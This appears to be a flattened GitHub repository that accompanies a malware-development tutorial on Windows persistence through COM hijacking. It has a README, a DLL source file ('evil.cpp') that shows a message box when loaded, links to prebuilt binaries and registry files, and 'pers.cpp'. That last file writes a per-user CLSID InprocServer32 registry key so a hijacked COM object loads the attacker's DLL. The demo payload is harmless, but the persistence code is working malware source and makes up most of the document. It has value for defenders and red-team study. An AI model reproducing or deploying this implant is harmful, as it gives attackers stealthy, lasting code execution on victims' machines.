├── README.md ├── evil.cpp ├── evil.dll ├── evil.reg ├── orig.reg ├── pers.cpp └── pers.exe /README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 3. C++ malware implementation. 2 | 3 | Malware persistence technique - via COM hijacking. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html](https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html) 6 | -------------------------------------------------------------------------------- /evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2022-05-02-malware-pers-3/636385aae2b97da0dcc0ddfc03048b57421d2509/evil.dll -------------------------------------------------------------------------------- /evil.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2022-05-02-malware-pers-3/636385aae2b97da0dcc0ddfc03048b57421d2509/evil.reg -------------------------------------------------------------------------------- /orig.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2022-05-02-malware-pers-3/636385aae2b97da0dcc0ddfc03048b57421d2509/orig.reg -------------------------------------------------------------------------------- /pers.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | pers.cpp 3 | windows low level persistence via COM hijacking 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html 6 | */ 7 | #include 8 | #include 9 | #include 10 | 11 | int main(int argc, char* argv[]) { 12 | HKEY hkey = NULL; 13 | 14 | // subkey 15 | const char* sk = "Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32"; 16 | 17 | // malicious DLL 18 | const char* dll = "C:\\Users\\User\\Desktop\\shared\\2022-05-02-malware-pers-3\\evil.dll"; 19 | 20 | // startup 21 | LONG res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)sk, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL); 22 | if (res == ERROR_SUCCESS) { 23 | // create new registry keys 24 | RegSetValueEx(hkey, NULL, 0, REG_SZ, (unsigned char*)dll, strlen(dll)); 25 | RegCloseKey(hkey); 26 | } else { 27 | printf("cannot create subkey for hijacking :(\n"); 28 | return -1; 29 | } 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2022-05-02-malware-pers-3/636385aae2b97da0dcc0ddfc03048b57421d2509/pers.exe --------------------------------------------------------------------------------